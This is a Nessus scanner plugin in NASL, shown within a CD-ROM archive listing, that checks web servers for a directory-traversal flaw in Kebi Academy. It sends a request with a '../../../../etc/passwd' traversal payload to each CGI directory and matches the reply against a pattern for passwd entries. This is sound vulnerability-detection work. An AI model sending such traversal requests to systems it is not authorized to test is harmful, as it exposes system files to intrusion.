home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / kebi_traversal.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  81 lines

  1. # This script was written by Renaud Deraison
  2. #
  3. # See the Nessus Scripts License for details
  4. #
  5.  
  6. if(description)
  7. {
  8.  script_id(11453); 
  9.  script_bugtraq_id(7125);
  10.  
  11.  
  12.  script_version("$Revision: 1.6 $");
  13.  
  14.  name["english"] = "Kebi Academy Directory Traversal";
  15.  script_name(english:name["english"]);
  16.  
  17.  desc["english"] = "
  18. Kebi Academy is vulnerable to a directory traversal.  
  19. It enables a remote attacker to view any file on the computer 
  20. with the privileges of the cgi/httpd user.
  21.  
  22. Solution : Contact the vendor at http://solution.nara.co.kr/
  23. Risk factor : High";
  24.  
  25.  script_description(english:desc["english"]);
  26.  
  27.  summary["english"] = "kebi academy is vulnerable to an exploit which lets an attacker view any file that the cgi/httpd user has access to.";
  28.  
  29.  script_summary(english:summary["english"]);
  30.  script_category(ACT_GATHER_INFO);
  31.  script_copyright(english:"This script is Copyright (C) 2003 Renaud Deraison");
  32.  family["english"] = "CGI abuses";
  33.  script_family(english:family["english"]);
  34.  script_dependencie("find_service.nes", "http_version.nasl");
  35.  script_require_ports("Services/www", 80);
  36.  exit(0);
  37. }
  38.  
  39. include("http_func.inc");
  40. include("http_keepalive.inc");
  41.  
  42. port = get_http_port(default:80);
  43.  
  44.  
  45.  
  46. if(!get_port_state(port))exit(0);
  47.  
  48.  
  49. function check(url)
  50. {
  51.   local_var req, r;
  52.  
  53.   req = http_get(item:url, port:port);
  54.   r = http_keepalive_send_recv(port:port, data:req);
  55.   if ( r == NULL ) exit(0);
  56.   
  57.   if(egrep(pattern:".*root:.*:0:[01]:", string:r))
  58.   {
  59.        security_hole(port:port);
  60.     return(1);
  61.   }
  62.  return(0);
  63. }
  64.  
  65.  
  66. alldirs = make_list("", "/k");
  67.  
  68.  
  69. dirs = cgi_dirs();
  70. foreach  d (dirs)
  71. {
  72.  alldirs = make_list(alldirs, d, string(d, "/k"));
  73. }
  74.  
  75.  
  76. foreach d (alldirs)
  77. {
  78.  url = string(d, "/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor");
  79.  if(check(url:url))exit(0);
  80. }
  81.